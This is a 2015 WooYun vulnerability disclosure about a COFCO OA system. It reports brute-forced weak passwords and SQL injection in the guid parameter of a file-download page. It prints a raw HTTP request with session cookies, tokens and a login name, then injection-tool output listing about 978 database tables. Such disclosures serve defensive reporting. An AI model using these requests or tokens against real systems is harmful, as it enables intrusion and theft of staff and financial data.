中粮集团某系统漏洞打包（SQL注入/弱口令）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147219

漏洞标题：中粮集团某系统漏洞打包（SQL注入/弱口令）

漏洞作者：路人甲

提交时间：2015-10-16 17:08

修复时间：2015-12-03 09:26

公开时间：2015-12-03 09:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-16：细节已通知厂商并且等待厂商处理中
2015-10-19：厂商已经确认，细节仅向厂商公开
2015-10-29：细节向核心白帽子及相关领域专家公开
2015-11-08：细节向普通白帽子公开
2015-11-18：细节向实习白帽子公开
2015-12-03：细节向公众公开

简要描述：

详细说明：

1.中粮集团OA系统：
http://oa.cofco-keystone.com/login.aspx?ReturnUrl=%2f

可爆破，大概爆出十多个账号

随便登陆个，是财务部主管账号

可以看全部的通讯录，员工手机邮箱泄露

大量内部文件

财务文件

漏洞证明：

2.SQL注入
下载文件出存在注入

抓包可以看出文件名被重命名，存在数据库中，单引号报错

GET /webdoc/file_download.aspx?guid=9969d7d40ef64d43b10cf2306a24b90a* HTTP/1.1
Host: oa.cofco-keystone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://oa.cofco-keystone.com/frm/frm_flow_mainform.aspx?flow_ins_id=35076&flow_id=56&frm_id=72&id=0&hidbutton=true&Dialog=open
Cookie: ASP.NET_SessionId=pv1o1va1losavp453kg0fo55; LtpaToken=AAECAzU2MjAzRTAwNTYyMThGODB6aGFuZ2xlad1YTytfNlfv3WEZfa6hjwO7afmW; .ASPXAUTH=250164406A3B28308592637D653CED7B351F821F209BB2B9CA1CEFE01BB656133A12E508F84ECB9CE276F836A055D420B2225DAC268132D47E0CC4666512B1A99B3D7DD360CE927B9551CB611F251386FCA9CF5B09E029168B7BD49134B1C27EC483CDDC45D2B87F4F878C958DF8A72319ED879E; FIOA_EMP_ID=212; loginname=zhanglei; loginorg=1; FIOA_IMG_FOLDER=FI; lastLtpaTokenHeadKK=AAECAzU2MjAzRTAwNTYyMThGODB6aGFuZ2xlad1YTytfNlfv3WEZfa6hjwO7afmW; condition_is_in_cookie_0d650337a5854fcf=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29; condition_is_in_cookie_a1d79435d4d04641=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29; condition_is_in_cookie_cd9541d7cecd4cad=%20WHERE%201%3D1%20AND%20%28isactive%3D1%29%20AND%20%28org_id%3D1%29
Connection: keep-alive

guid为注入参数
DBA权限

涉及14个数据库

当前库将近1000个表

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: EIS
[978 tables]
+------------------------------------+
| C20080124180047                    |
| C20080125123728                    |
| C20080125124235                    |
| C20080128150739                    |
| C20080701101237                    |
| C20080701102947                    |
| C20080701105700                    |
| C20080701145120                    |
| C20080701145726                    |
| C20081208140548                    |
| C20081208142643                    |
| C20081208150555                    |
| C20081208171154                    |
| C20081208175125                    |
| C20081208213917                    |
| C20081209091138                    |
| C20081209094320                    |
| C20081209103736                    |
| C20081209103903                    |
| C20081209110240                    |
| C20081209112145                    |
| C20081209113905                    |
| C20081209115629                    |
| C20081209124726                    |
| C20081209164003                    |
| C20081209175259                    |
| C20081210094254                    |
| C20081210101616                    |
| C20081210112101                    |
| C20101231131942                    |
| C20101231153631                    |
| C20110124134740                    |
| C20110124141835                    |
| C20110124152621                    |
| C20110124163602                    |
| C20110126092732                    |
| C20110126142013                    |
| C20110127144622                    |
| C20110127152846                    |
| C20110218165047                    |
| C20110324113257                    |
| C20110909135824                    |
| C20110909145635                    |
| C20110909152624                    |
| C20110909181709                    |
| C20110909181901                    |
| C20110909185023                    |
| C20110909185124                    |
| C20110909190919                    |
| C20110913110851                    |
| C20110913144213                    |
| C20110913152802                    |
| C20110913155212                    |
| C20110913164637                    |
| C20110913170458                    |
| C20110913174628                    |
| C20110913180207                    |
| C20110915110417                    |
| C20110923231348                    |
| C20110926214156                    |
| C20110926230955                    |
| C20111104140501                    |
| C20111123002753                    |
| C20120613113054                    |
| C20120613161656                    |
| C20120613161938                    |
| C20120613164904                    |
| C20120614120357                    |
| C20120614153425                    |
| C20120614162633                    |
| C20120614170525                    |
| C20120615124258                    |
| C20120615153351                    |
| C20120615164806                    |
| C20120620145657                    |
| C20120816141046                    |
| C20120817092237                    |
| C20120817110802                    |
| C20120817142707                    |
| C20120820173546                    |
| C20120912120904                    |
| C20120912154707                    |
| C20120912155839                    |
| C20120912164450                    |
| C20120913101028                    |
| C20120913101519                    |
| C20120913105933                    |
| C20120913215923                    |
| C20121015111508                    |
| C20121017103938                    |
| C20121017144542                    |
| C20121210195910                    |
| C20121224173758                    |
| C20130207142533                    |
| C20130211200642                    |
| C20130301153523                    |
| C20130321101409                    |
| C20130321162645                    |
| C20130513155919                    |
| C20130624114132                    |
| C20130624141804                    |
| C20130624150657                    |
| C20130624150917                    |
| C20130624152422                    |
| C20130624153840                    |
| C20130624155218                    |
| C20130624160557                    |
| C20130624161442                    |
| C20130624163301                    |
| C20130627155920                    |
| C20130628095655                    |
| C20130628160253                    |
| C20130702160933                    |
| C20130702171743                    |
| C20130722161707                    |
| C20130724135034                    |
| C20130801110511                    |
| C20131120100132                    |
| C20131121195530                    |
| C20131217111541                    |
| C20131219112635                    |
| C20131219162107                    |
| C20131231141612                    |
| C20140102165605                    |
| C20140103162425                    |
| C20140213144323                    |
| C20140313112224                    |
| C20140529151053                    |
| C20140529152111                    |
| C20140530145842                    |
| C20140620143948                    |
| C20140630152832                    |
| C20140815101043                    |
| C20140829165544                    |
| C20140912150645                    |
| C20141215111301                    |
| C20141217161647                    |
| C20141218160214                    |
| C20150323091114                    |
| C20150727164056                    |
| EIS_FileUrl                        |
| FI_BAK_SQLBAK                      |
| FI_MESSAGE_RECORD                  |
| FI_MESSAGE_RECORD                  |
| FI_ORG_DEPT_EMP                    |
| FI_ORG_DEPT_EMP                    |
| FI_ORG_DEPT_FLEX                   |
| FI_ORG_DEPUTYLOG                   |
| FI_ORG_DW_IMGPRINT                 |
| FI_ORG_DW_IMGPRINT                 |
| FI_ORG_EMPINROLES                  |
| FI_ORG_EMP_CHECKLOCAL              |
| FI_ORG_EMP_CHECKLOCAL              |
| FI_ORG_EMP_FLEX                    |
| FI_ORG_EMP_IMGSIGN                 |
| FI_ORG_EMP_POSITION_temp           |
| FI_ORG_GROUP                       |
| FI_ORG_INFO_FLEX                   |
| FI_ORG_INFO_FLEX                   |
| FI_ORG_POSITION_EMP                |
| FI_ORG_POSITION_EMP                |
| FI_ORG_ROLEOFRIGHT                 |
| FI_ORG_ROLES                       |
| FI_ORG_TITLE                       |
| FI_ORG_USEROFRIGHT                 |
| FI_PARTALS_LISTRIGHT               |
| FI_PJ_INFO                         |
| FI_SYS_AGENT_LEFTMENU              |
| FI_SYS_AGENT_LEFTMENU              |
| FI_SYS_AGENT_TOPMENU               |
| FI_SYS_ALERT_H                     |
| FI_SYS_ALERT_H                     |
| FI_SYS_AREA                        |
| FI_SYS_AWAKE                       |
| FI_SYS_CONDITION                   |
| FI_SYS_DATASOURCE                  |
| FI_SYS_DESC                        |
| FI_SYS_DESKTOPSOLUTION             |
| FI_SYS_DESKTOP_CLASS               |
| FI_SYS_DESKTOP_CLASS               |
| FI_SYS_DESKTOP_DEFAULT             |
| FI_SYS_DESKTOP_FLOW_DEFINE_DETAIL  |
| FI_SYS_DESKTOP_FLOW_DEFINE_DETAIL  |
| FI_SYS_DESKTOP_IMG                 |
| FI_SYS_DESKTOP_INFO                |
| FI_SYS_DESKTOP_LINK                |
| FI_SYS_DESKTOP_SELF                |
| FI_SYS_DICT                        |
| FI_SYS_ERROR                       |
| FI_SYS_FAVORITE_DEFAULT            |
| FI_SYS_FAVORITE_DEFAULT            |
| FI_SYS_FUNCTION_DETAIL             |
| FI_SYS_FUNCTION_DETAIL             |
| FI_SYS_FUNCTION_RIGHT              |
| FI_SYS_IKEY                        |
| FI_SYS_IMG                         |
| FI_SYS_IP                          |
| FI_SYS_KEY                         |
| FI_SYS_LOGON_DEFAULT               |
| FI_SYS_LOGTYPE                     |
| FI_SYS_Login_ErrLog                |
| FI_SYS_Login_ErrLog                |
| FI_SYS_Login_ErrLog                |
| FI_SYS_MENUSOLUTION                |
| FI_SYS_MENU_BANNER                 |
| FI_SYS_MENU_BANNER                 |
| FI_SYS_MENU_BANNERSOLUTION         |
| FI_SYS_MENU_LEFTLINK               |
| FI_SYS_MENU_LEFTLINK               |
| FI_SYS_MENU_LEFTSOLUTION           |
| FI_SYS_MENU_RIGHT                  |
| FI_SYS_MENU_SELF                   |
| FI_SYS_MOBILE                      |
| FI_SYS_PORTAL_RIGHT                |
| FI_SYS_PRINTSET                    |
| FI_SYS_PROCEDURE_PRM               |
| FI_SYS_PROCEDURE_PRM               |
| FI_SYS_PROFILE_LIST                |
| FI_SYS_QUERY_CONDITION             |
| FI_SYS_QUERY_ORDER                 |
| FI_SYS_QUERY_SOLUTION              |
| FI_SYS_RIGHTASSIGN_INFO            |
| FI_SYS_RIGHTASSIGN_ITEM            |
| FI_SYS_SELSYSDATA_URL              |
| FI_SYS_SERIALNO                    |
| FI_SYS_SIGN_DATA                   |
| FI_SYS_SIGN_HISTORY                |
| FI_SYS_SIGN_MARK                   |
| FI_SYS_TABLE_DATARIGHT             |
| FI_SYS_TABLE_DATARIGHT             |
| FI_SYS_TRANSACTION                 |
| FI_SYS_VIEW                        |
| FI_customer_info                   |
| FTFY_TEL_COMMON                    |
| FTFY_TEL_MAN                       |
| KMS_CollectCategory                |
| KMS_CollectPersonal                |
| KMS_Images                         |
| KMS_KnowledgeDynamic               |
| KMS_LibraryDocCount                |
| KMS_LibraryDocCount                |
| KMS_LibraryDownLoad                |
| KMS_LibraryFolder                  |
| KMS_LibraryKMFolder                |
| KMS_LibraryKMRelated               |
| KMS_LibraryProFolder               |
| KMS_LibraryProfessionalFolder      |
| KMS_LibraryView                    |
| KMS_PortalMenus                    |
| KMS_Search_KeyWord                 |
| KMS_Search_KeywordRecord           |
| KMS_Search_Knowledge               |
| KMS_Search_Log                     |
| KMS_Search_ModuleList              |
| KMS_Search_Record                  |
| KMS_Search_Synonym                 |
| KY_ARCHIVE_TREE_TMP                |
| KY_ARCHIVE_TREE_TMP                |
| Mekp_AttriMouldBase                |
| Mekp_AttriMouldInfo                |
| Mekp_AttriSelDefine                |
| Mekp_AttriUseInfo                  |
| Mekp_AttributeOutData              |
| Mekp_AttributeType                 |
| Mekp_BusinessAttribute             |
| Mekp_CommentsReply                 |
| Mekp_KnowledgeMapImg               |
| Mekp_KnowledgeMapRelation          |
| Mekp_LibrarySelectColumn           |
| Mekp_MouldDefaultSel               |
| Mekp_PersonalCategory              |
| Mekp_PersonalOperation             |
| OA_CALENDAR_ASSIGN_DETAIL          |
| OA_CALENDAR_ASSIGN_DETAIL          |
| OA_CALENDAR_ASSIGN_DETAIL          |
| OA_CALENDAR_ASSIGN_EMP             |
| OA_CALENDAR_TASK                   |
| OA_CALENDAR_WORK                   |
| OA_CLIENT_ACCOUNT_INFO             |
| OA_CLIENT_FLOW_DISPENSE            |
| OA_CLIENT_FLOW_NOTICE              |
| OA_CLIENT_FLOW_READER              |
| OA_CLIENT_FLOW_SENDER              |
| OA_CLIENT_FLOW_WAIT                |
| OA_CONNECTOR_GROUP_DETAIL          |
| OA_CONNECTOR_GROUP_DETAIL          |
| OA_CONNECTOR_GROUP_DETAIL          |
| OA_CRM_SUPPLIER                    |
| OA_CalendarSet_WorkTime            |
| OA_CalendarSet_WorkTime            |
| OA_DINNER_REGISTER                 |
| OA_DOC_CARD_RECORD                 |
| OA_DOC_CARD_RECORD                 |
| OA_DOC_CLASS                       |
| OA_DOC_DOCUMENT_INPUT_TEMP         |
| OA_DOC_DOCUMENT_INPUT_TEMP         |
| OA_DOC_FILE_DOWNLOAD               |
| OA_DOC_FILE_DOWNLOAD               |
| OA_DOC_FILE_INFO                   |
| OA_DOC_FLOW                        |
| OA_DOC_LAW_TREE                    |
| OA_DOC_LAW_TREE                    |
| OA_DOC_NEWS_REPLY                  |
| OA_DOC_NEWS_REPLY                  |
| OA_DOC_NEWS_TITLE                  |
| OA_DOC_POSITION                    |
| OA_DOC_READ                        |
| OA_DOC_RECORD                      |
| OA_DOC_REPLY                       |
| OA_DOC_RIGHT                       |
| OA_DOC_SECURITY                    |
| OA_DOC_TEMPLATE                    |
| OA_DOC_TREE                        |
| OA_DOSSIER_LOG                     |
| OA_EMAIL_MESSAGEIDS                |
| OA_EMAIL_RECIVE                    |
| OA_EMAIL_SEND                      |
| OA_EMAIL_SET                       |
| OA_EXAM_DANXUAN_INFO               |
| OA_EXAM_DANXUAN_INFO               |
| OA_EXAM_DANXUAN_ITEM               |
| OA_EXAM_DATABASE                   |
| OA_EXAM_DUOXUAN_INFO               |
| OA_EXAM_DUOXUAN_ITEM               |
| OA_EXAM_EMP_DANXUAN                |
| OA_EXAM_EMP_DUOXUAN                |
| OA_EXAM_EMP_INFO                   |
| OA_EXAM_EMP_ITEM                   |
| OA_EXAM_EMP_PANDUANG               |
| OA_EXAM_EMP_PINGFEN                |
| OA_EXAM_EMP_WENDA                  |
| OA_EXAM_KAOSHI_DANXUAN             |
| OA_EXAM_KAOSHI_DUOXUAN             |
| OA_EXAM_KAOSHI_INFO                |
| OA_EXAM_KAOSHI_ITEM                |
| OA_EXAM_KAOSHI_PANDUANG            |
| OA_EXAM_KAOSHI_WENDA               |
| OA_EXAM_PANDUANG                   |
| OA_EXAM_PASSTESTLOG                |
| OA_EXAM_SCORE                      |
| OA_EXAM_SHIJUAN_INFO               |
| OA_EXAM_SHIJUAN_ITEM               |
| OA_EXAM_SUBJECT                    |
| OA_EXAM_TEST                       |
| OA_EXAM_WENDA                      |
| OA_FLOW_CENTER_MENU                |
| OA_FLOW_DEFINE_CUSTACTION          |
| OA_FLOW_DEFINE_CUSTACTION          |
| OA_FLOW_DEFINE_DESK                |
| OA_FLOW_DEFINE_FORM_RIGHT          |
| OA_FLOW_DEFINE_FORM_RIGHT          |
| OA_FLOW_DEFINE_NODE_ACTION         |
| OA_FLOW_DEFINE_NODE_ACTION         |
| OA_FLOW_DEFINE_NODE_LINE           |
| OA_FLOW_DEFINE_NODE_POSITION       |
| OA_FLOW_DEFINE_REF                 |
| OA_FLOW_DEFINE_SCHEMA              |
| OA_FLOW_DEFINE_SENDERCLASS         |
| OA_FLOW_DEFINE_SENDERCLASS         |
| OA_FLOW_DEFINE_SENTENCE            |
| OA_FLOW_DEFINE_USER_SENTENCE       |
| OA_FLOW_DOC_READER                 |
| OA_FLOW_INST_DESK                  |
| OA_FLOW_INST_DESK                  |
| OA_FLOW_INST_DISPENSE              |
| OA_FLOW_INST_FORM_H                |
| OA_FLOW_INST_FORM_H                |
| OA_FLOW_INST_H                     |
| OA_FLOW_INST_MAIL                  |
| OA_FLOW_INST_MOBILE                |
| OA_FLOW_INST_MSG                   |
| OA_FLOW_INST_NODE_H                |
| OA_FLOW_INST_NODE_H                |
| OA_FLOW_INST_READER                |
| OA_FLOW_INST_REPLY                 |
| OA_FLOW_INST_SENDER                |
| OA_FLOW_MOBILE_VALIDATE            |
| OA_FLOW_NOTICE_COMPLETED           |
| OA_FLOW_NOTICE_COMPLETED           |
| OA_FLOW_NOTICE_DESK                |
| OA_FLOW_NOTICE_DISPENSE            |
| OA_FLOW_NOTICE_READER_MAIN         |
| OA_FLOW_NOTICE_READER_MAIN         |
| OA_FLOW_NOTICE_SENDER              |
| OA_FLOW_SUPERVISE_CHANGEFLOW       |
| OA_FLOW_SUPERVISE_LOG              |
| OA_FLOW_TIMEOUT_READER             |
| OA_FLOW_WORDFORM                   |
| OA_FORM_AIPSIGN                    |
| OA_FORM_AWAKE                      |
| OA_FORM_BUTTON                     |
| OA_FORM_DOC                        |
| OA_FORM_FIELD_FLOW                 |
| OA_FORM_FIELD_FLOW                 |
| OA_FORM_FIELD_TAB                  |
| OA_FORM_INFO                       |
| OA_FORM_LIST_BUTTON                |
| OA_FORM_LIST_BUTTON                |
| OA_FORM_LIST_CONDITION             |
| OA_FORM_LIST_FIELD                 |
| OA_FORM_LIST_ORDER                 |
| OA_FORM_MENU                       |
| OA_FORM_REFSUBFORM_DEFINE          |
| OA_FORM_RIGHT                      |
| OA_FORM_SCRIPT                     |
| OA_FORM_SENTENCE                   |
| OA_FORM_SIGN                       |
| OA_FORM_TREEVIEW                   |
| OA_FORM_TREE_CLASS                 |
| OA_FORM_TREE_DATA                  |
| OA_FROM_TREE                       |
| OA_HOLEDAYCARD_HISTORY             |
| OA_HOLEDAYCARD_HISTORY             |
| OA_HR_CW_CALENDAR                  |
| OA_HR_CW_LEAVE_TYPE                |
| OA_HR_CW_LEAVE_TYPE                |
| OA_HR_CW_OUT_TYPE                  |
| OA_HR_CW_OUT_TYPE                  |
| OA_HR_CW_WORKLEAVE                 |
| OA_HR_CW_WORKSTATUS                |
| OA_HR_CW_YEARCALENDAR              |
| OA_HoledayCardContent              |
| OA_LINK_EMAIL_AlERT                |
| OA_LINK_EMAIL_SET                  |
| OA_MAIL_DEFINE                     |
| OA_MAIL_SMTP                       |
| OA_MEETING_ATTEND                  |
| OA_MEETING_ATTEND                  |
| OA_MEETING_AWAKE                   |
| OA_MEETING_REC                     |
| OA_MEETING_ROOM_REGISTER           |
| OA_MEETING_ROOM_REGISTER           |
| OA_MEETING_ROOM_SOURCE             |
| OA_MEETING_TASK                    |
| OA_MEETNG_ROOM_OTHERSOURCE         |
| OA_MESSAGE_ISREAD                  |
| OA_MESSAGE_ISREAD                  |
| OA_MESSAGE_REPLAY                  |
| OA_MOBILE_DEFINE                   |
| OA_MOBILE_MENU                     |
| OA_MOBILE_MSG                      |
| OA_MOBILE_PARAMETER                |
| OA_MOBILE_TYPE                     |
| OA_NOTE_DESK                       |
| OA_NOTICE_INFO                     |
| OA_NOTICE_READ                     |
| OA_NOTICE_REPLY                    |
| OA_PROJECT_DEFINE                  |
| OA_PROJECT_FLOW                    |
| OA_PROJECT_INFO                    |
| OA_PROJECT_ITEM                    |
| OA_PROJECT_SEL                     |
| OA_PROJECT_TREE                    |
| OA_PROJECT_ZT_TREE                 |
| OA_QUESTIONAIRE_RESULT             |
| OA_QUESTIONAIRE_RESULT             |
| OA_REG_COMPANYDATA                 |
| OA_REPORT_ACTIVE_INFO              |
| OA_REPORT_FLASH_FIELD              |
| OA_REPORT_FLASH_INFO               |
| OA_REPORT_HTML_FIELD               |
| OA_REPORT_HTML_INFO                |
| OA_REPORT_LIST_FIELD               |
| OA_REPORT_LIST_INFO                |
| OA_REPORT_LIST_SORT                |
| OA_REPORT_PIC_FIELD                |
| OA_REPORT_PIC_INFO                 |
| OA_REPORT_RUNTIME                  |
| OA_REPORT_SCRIPT                   |
| OA_RSS_TREE                        |
| OA_SERVER_ACCOUNT_INFO             |
| OA_SERVER_ERROR                    |
| OA_SERVER_FLOW_DISPENSE            |
| OA_SERVER_FLOW_NOTICE              |
| OA_SERVER_FLOW_READER              |
| OA_SERVER_FLOW_SENDER              |
| OA_SERVER_FLOW_WAIT                |
| OA_SERVER_NOTICE_DISPENSE          |
| OA_SERVER_NOTICE_NOTICE            |
| OA_SERVER_NOTICE_READER            |
| OA_SERVER_NOTICE_SENDER            |
| OA_SERVER_NOTICE_WAIT              |
| OA_SUBFILL_CONDITION               |
| OA_SUBFILL_FIELD                   |
| OA_SUBFILL_ORDER                   |
| OA_SUBFORM_FIELD                   |
| OA_SUBFORM_INFO                    |
| OA_SUBFORM_VIEW_FIELD              |
| OA_SUBFORM_VIEW_INFO               |
| OA_SYSFORM_INFO                    |
| OA_TASK_INLINE                     |
| OA_TASK_MONTH_DETAIL               |
| OA_TASK_MONTH_MAIN                 |
| OA_TASK_WEEK_DETAIL                |
| OA_TASK_WEEK_MAIN                  |
| OA_VOTE_FORMVIEW_INFO              |
| OA_VOTE_FORMVIEW_ITEM              |
| OA_VoteDetail                      |
| OA_VoteList                        |
| OA_Votes_Item                      |
| OA_Votes_Item                      |
| OA_WEBDOC_BOOKMARK                 |
| OA_WEBDOC_PATH                     |
| OA_WEBDOC_SIGNATURE                |
| OA_WEBDOC_TEMPLATE_BOOKMARKS       |
| OA_WEBDOC_TEMPLATE_BOOKMARKS       |
| OA_WEBDOC_WEBSIGN_DATA             |
| OA_WEBDOC_WEBSIGN_HISTORY          |
| OA_WEBDOC_WEBSIGN_MARK             |
| OA_WORK_TIME                       |
| OA_已处理流程                                |
| OA_流程处理                                |
| Passport_Account                   |
| Passport_SynchronizeSite           |
| Passport_WebServiceUser            |
| S20080124182553                    |
| S20080126141044                    |
| S20080701110343                    |
| S20080701145950                    |
| S20081208142516                    |
| S20081208142956                    |
| S20081208143319                    |
| S20081208205000                    |
| S20081209091249                    |
| S20081209102001                    |
| S20081209104027                    |
| S20081209105710                    |
| S20081209105756                    |
| S20081209105812                    |
| S20081209105830                    |
| S20081209105908                    |
| S20081209110425                    |
| S20081209112432                    |
| S20081209114233                    |
| S20081209115726                    |
| S20081210112947                    |
| S20081210162322                    |
| S20101231100451                    |
| S20101231153850                    |
| S20110124143152                    |
| S20110124154523                    |
| S20110127145002                    |
| S20110909134445                    |
| S20110909153430                    |
| S20110913171245                    |
| S20110913174958                    |
| S20110914121354                    |
| S20110921124952                    |
| S20110926214618                    |
| S20110926215323                    |
| S20111122142139                    |
| S20111122143204                    |
| S20111123003002                    |
| S20111124132643                    |
| S20120614123602                    |
| S20120615170006                    |
| S20120618100316                    |
| S20120618101443                    |
| S20120620160840                    |
| S20120817111649                    |
| S20120817144757                    |
| S20120821113528                    |
| S20121010110610                    |
| S20130301162645                    |
| S20130624164416                    |
| S20130624165051                    |
| S20130624165536                    |
| S20130624165641                    |
| S20131120110146                    |
| S20131220085431                    |
| S20140103164907                    |
| S20150107102359                    |
| S20150326095820                    |
| Students_admin                     |
| T_Information                      |
| TempImportTable                    |
| V_CALENDAR_OUTOFOFF_TYPE           |
| V_FI_CONNECTOR_EMAIL_ADDRESS       |
| V_FI_MESSAGE_INFO_LIST             |
| V_FI_MESSAGE_LIST_STATUS_0         |
| V_FI_MESSAGE_LIST_STATUS_1         |
| V_FI_MESSAGE_LIST_STATUS_2         |
| V_FI_MESSAGE_LIST_STATUS_3         |
| V_FI_MESSAGE_LIST_STATUS_4         |
| V_FI_ORG_ACCOUNT                   |
| V_FI_ORG_DW                        |
| V_FI_ORG_EMPINROLES                |
| V_FI_ORG_EMP_LEAVE                 |
| V_FI_ORG_EMP_LEAVE                 |
| V_FI_ORG_EMP_MENU                  |
| V_FI_ORG_EMP_POSITION              |
| V_FI_ORG_EMP_SEL                   |
| V_FI_ORG_INFO                      |
| V_FI_ORG_POSITION_EMP              |
| V_FI_ORG_POSITION_EMP              |
| V_FI_ORG_POSITION_MENU             |
| V_FI_ORG_POSITION_TREE             |
| V_FI_ORG_ROLES_MENU                |
| V_FI_ORG_ROLES_MENU                |
| V_FI_REG_EMPINROLES                |
| V_FI_SYS_AGENT                     |
| V_FI_SYS_DESKTOP_CLASS             |
| V_FI_SYS_DESKTOP_CLASS             |
| V_FI_SYS_EMPMENU_ROLE              |
| V_FI_SYS_EMPMENU_TREE              |
| V_FI_SYS_FUNCTION_DETAIL           |
| V_FI_SYS_FUNCTION_DETAIL           |
| V_FI_SYS_FUNCTION_EDIT             |
| V_FI_SYS_FUNCTION_LIST             |
| V_FI_SYS_FUNCTION_RIGHT            |
| V_FI_SYS_GETDATE                   |
| V_FI_SYS_IMG                       |
| V_FI_SYS_LOGIN_MESSAGE             |
| V_FI_SYS_MENUFUNCTION              |
| V_FI_SYS_MENU_FUNCTION             |
| V_FI_SYS_MENU_FUNCTION             |
| V_FI_SYS_MENU_LEFTLINK             |
| V_FI_SYS_MENU_RIGHT_TMP            |
| V_FI_SYS_MENU_ROLEFUNCTION         |
| V_FI_SYS_MENU_SELF                 |
| V_FI_SYS_MENU_TREE                 |
| V_FI_SYS_PORTAL_TREE               |
| V_FI_SYS_PROCEDURE_PRM             |
| V_FI_SYS_PROCEDURE_PRM             |
| V_FI_SYS_RIGHTASSIGN_INFO          |
| V_FI_SYS_SELEMP                    |
| V_FI_SYS_TABLE_DATARIGHT           |
| V_FI_SYS_TRANSACTION               |
| V_FI_SYS_VIEW                      |
| V_FI_SqlBak                        |
| V_KY_ARCHIVE_TREE                  |
| V_MEETING_ROOM_CALENDAR            |
| V_MESSAGE_EMP_FLEX                 |
| V_MOBILE_EnabledModule             |
| V_MOBILE_UnEnabledModule           |
| V_OA_CALENDAR_ASSIGN_EMP           |
| V_OA_CALENDAR_ASSIGN_EMP           |
| V_OA_CALENDAR_ASSIGN_EMP           |
| V_OA_CALENDAR_ASSIGN_TMP           |
| V_OA_CALENDAR_INLINE               |
| V_OA_CALENDAR_OUTOFOFF_DATA        |
| V_OA_CALENDAR_OUTOFOFF_TYPE        |
| V_OA_CALENDAR_TASK                 |
| V_OA_CALENDAR_TITLE                |
| V_OA_CLIENT_ACCOUNT_INFO           |
| V_OA_CLIENT_FLOW_DISPENSE          |
| V_OA_CONNECTOR_GROUP_DEP           |
| V_OA_CONNECTOR_GROUP_DEP           |
| V_OA_CONNECTOR_GROUP_DEP           |
| V_OA_CONNECTOR_GROUP_EMP           |
| V_OA_CONNECTOR_GROUP_IN            |
| V_OA_CONNECTOR_GROUP_MAN           |
| V_OA_CONNECTOR_GROUP_OUT           |
| V_OA_CONNECTOR_GROUP_PGI           |
| V_OA_CONNECTOR_GROUP_PGO           |
| V_OA_CONNECTOR_GROUP_POS           |
| V_OA_CONNECTOR_GROUP_SGI           |
| V_OA_CONNECTOR_GROUP_SGO           |
| V_OA_DINNER_REGISTER               |
| V_OA_DOC_CARD                      |
| V_OA_DOC_CLASS                     |
| V_OA_DOC_DOCUMENT_Q                |
| V_OA_DOC_DOCUMENT_Q                |
| V_OA_DOC_FILE                      |
| V_OA_DOC_FLOW                      |
| V_OA_DOC_LAW_TREE                  |
| V_OA_DOC_LAW_TREE                  |
| V_OA_DOC_NEWS_REPLY                |
| V_OA_DOC_NEWS_REPLY                |
| V_OA_DOC_POSITION                  |
| V_OA_DOC_READ                      |
| V_OA_DOC_RECORD                    |
| V_OA_DOC_REPLY                     |
| V_OA_DOC_RIGHT_DEPT                |
| V_OA_DOC_RIGHT_POSITION            |
| V_OA_DOC_TEMPLATE                  |
| V_OA_DOC_TREE                      |
| V_OA_DOSSIER_LOG                   |
| V_OA_EXAM_DATABASE                 |
| V_OA_EXAM_EMP_DANXUAN              |
| V_OA_EXAM_EMP_DUOXUAN              |
| V_OA_EXAM_EMP_INFO                 |
| V_OA_EXAM_EMP_ITEM                 |
| V_OA_EXAM_EMP_PANDUANG             |
| V_OA_EXAM_EMP_PINGFEN              |
| V_OA_EXAM_EMP_WENDA                |
| V_OA_EXAM_KAOSHI_INFO              |
| V_OA_EXAM_NEEDTEST                 |
| V_OA_EXAM_PINGFEN_TREE             |
| V_OA_EXAM_SCORE                    |
| V_OA_EXAM_SHIJUAN_DANXUAN          |
| V_OA_EXAM_SHIJUAN_DUOXUAN          |
| V_OA_EXAM_SHIJUAN_INFO             |
| V_OA_EXAM_SHIJUAN_PANDUANG         |
| V_OA_EXAM_SHIJUAN_WENDA            |
| V_OA_EXAM_TEST                     |
| V_OA_FLOW_ARCHIVE                  |
| V_OA_FLOW_CENTER_MENU              |
| V_OA_FLOW_DEFINE_FORM_ALL          |
| V_OA_FLOW_DEFINE_FORM_ALL          |
| V_OA_FLOW_DEFINE_FORM_ALL          |
| V_OA_FLOW_DEFINE_NODE              |
| V_OA_FLOW_DEFINE_REF_NEW           |
| V_OA_FLOW_DEFINE_REF_NEW           |
| V_OA_FLOW_DEFINE_RELFORM           |
| V_OA_FLOW_DESKTOP_AWAKE            |
| V_OA_FLOW_DOCUMENT                 |
| V_OA_FLOW_INST_DELAYBYINSTNODE     |
| V_OA_FLOW_INST_DELAYBYINSTNODE     |
| V_OA_FLOW_INST_DELAYBYINSTNODE     |
| V_OA_FLOW_INST_DELAYPASSBYINSTNODE |
| V_OA_FLOW_INST_DESK                |
| V_OA_FLOW_INST_DISPENSE            |
| V_OA_FLOW_INST_H                   |
| V_OA_FLOW_INST_LIST_A              |
| V_OA_FLOW_INST_LIST_A              |
| V_OA_FLOW_INST_LIST_H              |
| V_OA_FLOW_INST_MSG                 |
| V_OA_FLOW_INST_NODE_A              |
| V_OA_FLOW_INST_NODE_A              |
| V_OA_FLOW_INST_NODE_BACKSIGN       |
| V_OA_FLOW_INST_NODE_H_TRACK        |
| V_OA_FLOW_INST_NODE_JUMPBACK       |
| V_OA_FLOW_INST_NODE_TRACK          |
| V_OA_FLOW_INST_REPLY               |
| V_OA_FLOW_INST_SENDER              |
| V_OA_FLOW_MOBILE_VALIDATE          |
| V_OA_FLOW_MYFLOWC_TEMP             |
| V_OA_FLOW_MYFLOW_TEMP              |
| V_OA_FLOW_NODE_RIGHT               |
| V_OA_FLOW_NOTICE_DESK              |
| V_OA_FLOW_NOTICE_DISPENSE          |
| V_OA_FLOW_NOTICE_READER_MAIN       |
| V_OA_FLOW_NOTICE_SENDER            |
